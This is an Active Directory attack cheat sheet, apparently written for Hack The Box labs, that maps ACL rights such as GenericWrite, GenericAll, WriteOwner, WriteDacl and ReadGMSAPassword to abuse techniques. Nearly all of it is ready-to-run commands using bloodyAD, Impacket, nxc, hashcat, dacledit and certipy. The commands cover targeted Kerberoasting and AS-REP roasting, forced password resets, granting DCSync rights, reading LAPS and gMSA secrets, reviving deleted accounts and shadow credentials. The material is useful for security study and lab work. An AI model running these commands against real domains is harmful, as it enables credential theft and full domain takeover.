AD ACL


User-GenericWrite

You have GenericWrite on user

Targeted Kerberoast

We can set a SPN on targeted user and perform usual Kerberoast attack.
# Add SPN
bloodyAD -k --host 'DC01.BOX.HTB' --dc-ip '10.129.41.25' -d 'BOX.HTB' -u 'USER' set object TARGETEDUSER servicePrincipalName -v 'what/ever'
# bloodyAD -k --host 'DC01.BOX.HTB' --dc-ip '10.129.41.25' -d 'VINTAGE.HTB' -u 'USER' get object TARGETEDUSER --attr servicePrincipalName

# Ask TGS
GetUserSPNs.py 'BOX.HTB'/'USER' -k -no-pass -dc-ip 'DC01.BOX.HTB' -dc-host 'DC01.BOX.HTB' -request-user TARGETEDUSER -outputfile /tmp/hashes.kerberoast
# Or nxc ldap DC01.BOX.HTB -d 'BOX.HTB' -u 'USER' -p 'PASS' --kerberoast /tmp/hashes.kerberoast

# Remove SPN
bloodyAD -k --host 'DC01.BOX.HTB' --dc-ip '10.129.41.25' -d 'BOX.HTB' -u 'USER' set object TARGETEDUSER servicePrincipalName

# Crack
hashcat -m 13100 -a 0 /tmp/hashes.kerberoast /usr/share/wordlists/rockyou.txt  --potfile-path=HASHCATPOT
You can also use targetedKerberoast tool that automate this process…
targetedKerberoast will add SPN for any vulnerable user, ask TGS and finally remove added SPN.
git clone https://github.com/ShutdownRepo/targetedKerberoast.git /opt/git/targetedKerberoast
pip3 install -r /opt/git/targetedKerberoast/requirements.txt
python3 /opt/git/targetedKerberoast/targetedKerberoast.py -v -d 'box.htb' -u 'user' -p 'pass'

# If you get clock errors please sync with DC ntp
# sudo rdate -n 10.129.75.247

Then use hashcat to crack the hash (TGS)
hashcat -m 13100 /tmp/hash /usr/share/wordlists/rockyou.txt --potfile-path=/home/user/HASHCATPOT

Targeted AS-REP

Pretty close to targeted kerberoast method,
we set the DONT_REQ_PREAUTH property on targeted user to perform targeted AS-REP Roasting
bloodyAD -k --host 'DC01.BOX.HTB' --dc-ip '10.129.41.25' -d 'BOX.HTB' -u 'COMPROMISEDACCOUNT' add uac TARGETEDACCOUNT -f DONT_REQ_PREAUTH
[-] ['DONT_REQ_PREAUTH'] property flags added to TARGETEDACCOUNT's userAccountControl

GetNPUsers.py 'BOX.HTB'/'COMPROMISEDACCOUNT' -k -no-pass -dc-ip 'DC01.BOX.HTB' -dc-host 'DC01.BOX.HTB' -usersfile <(echo -e 'TARGETEDACCOUNT') -outputfile /tmp/hashes.asreproast -format hashcat
$krb5asrep$23$TARGETEDACCOUNT@BOX.HTB:xxxxxxxxxxxxxx

hashcat -m 18200 -a 0 hashes.asreproast /usr/share/wordlists/rockyou.txt --potfile-path=HASHCATPOT

Enable user

That not an attack, but you can enable disabled account
bloodyAD -k --host 'DC01.BOX.HTB' --dc-ip '10.129.41.25' -d 'BOX.HTB' -u 'USER' remove uac TARGETEDUSER -f ACCOUNTDISABLE
[-] ['ACCOUNTDISABLE'] property flags removed from TARGETEDUSER's userAccountControl

User-GenericAll

GenericAll contains GenericWrite.
In addition of GenericWrite actions, GenericAll allow you to set password

Set Password

If you have GenericAll access against an user, you can set the user’s password.
(You probably want to try GenericWrite methods first to retrieve the user’s hash before losing it)
net user robert FNUEOFNSIDsilfelifsef_1 /domain

From linux
# With password
bloodyAD --host 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p 'PASS' set password VICTIM Pototo_123

# With NT HASH
bloodyAD --host 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p ':NTHASH' set password VICTIM Pototo_123

User-WriteOwner

You can set VICTIM’s owner to USER,
then you grants USERS rights on VICTIM.
bloodyAD --host 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p 'PASS' set owner VICTIM USER
bloodyAD --host 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p 'PASS' add genericAll VICTIM USER
#bloodyAD --host 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p 'PASS' set password VICTIM Pototo_123

Group-WriteOwner

Change owner of “GROUP” to “USER”
bloodyAD --host 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p 'PASS' set owner 'GROUP' 'USER'

Group-Owner

Grant “USER” genericAll right on “GROUP”
bloodyAD --host 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p 'PASS' add genericAll 'GROUP' 'USER'

Group-GenericAll

Add “USER” to group “GROUP”
bloodyAD --host 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p 'PASS' add groupMember 'GROUP' 'USER'

ReadLAPSPassword

Read LAPS local administrators passwords
nxc ldap 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p 'PASS' --module laps

WriteDacl

Add any ACL you want, such as DCSync
bloodyAD --host 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p 'PASS' set DCSync USER

ReadGMSAPassword

Retrieve gMSA account’s NT hash
bloodyAD -k --host 'DC01.BOX.HTB' --dc-ip '10.129.41.25' -d 'BOX.HTB' -u 'USER' -p 'PASS' get object 'GMSA01$' --attr msDS-ManagedPassword
nxc ldap BOX.HTB -u 'USER' -p 'PASS' --gmsa

WriteSPN

Perform Targeted Kerberoast

Reanimate-Tombstones

You can reanimate deleted objects, but you probably need access over destination OU

Listing of deleted objects
ldapsearch -H 'ldap://BOX.HTB' -D USER@BOX.HTB -w 'Pototo_123' -b "DC=BOX,DC=htb" "(isDeleted=*)" -v -E pr=1000/noprompt -E '!1.2.840.113556.1.4.417'

Resolve objectSid
$ cat <<'EOF'|python3
import base64, struct; sid=b"AQUAAAAAAAUVAAAAArr/UoEu+1C7Lcd+VQQAAA=="; b=base64.b64decode(sid); print("S-%d-%d-%s" % (b[0], int.from_bytes(b[2:8], "big"), '-'.join(str(struct.unpack("<I", b[i:i+4])[0]) for i in range(8, len(b), 4))))
EOF
S-1-5-21-1392491010-1358638721-2126982581-1109

And dacledit to check the specific ACE between USER and given SID
dacledit.py -action 'read' -rights-guid 'bf9679c0-0de6-11d0-a285-00aa003049e2' -principal 'USER' -target-sid 'S-1-5-21-1392491010-1358638721-2126982581' "BOX.HTB"/"USER" -k -no-pass

Powershell command to restore user with SID
Get-ADObject -Filter {objectSid -eq "S-1-5-21-1392491010-1358638721-2126982581-1109"} -IncludeDeletedObjects
Get-ADObject -Filter {objectSid -eq "S-1-5-21-1392491010-1358638721-2126982581-1109"} -IncludeDeletedObjects | Restore-ADObject

If you have control over destination OU, you can then leverage this access to gain control over the account
Example for accounts that don’t have admincount set
# Give ourself fullcontrol over OU
dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'USER' -target-dn 'OU=MYOU,DC=box,DC=htb' 'box.htb'/'USER':'Pototo_1' -k

# Check if we have rights over targeted account
dacledit.py -action 'read' -principal 'USER' -target-dn 'CN=targeteduser,OU=MYOU,DC=box,DC=htb' 'box.htb'/'USER':'Pototo_1' -k

# Then we leverage those rights, with shadowcreds for example
certipy shadow auto -username USER@box.htb -p Pototo_123 -account targeteduser -dc-ip 10.129.123.82 -ns 10.129.123.82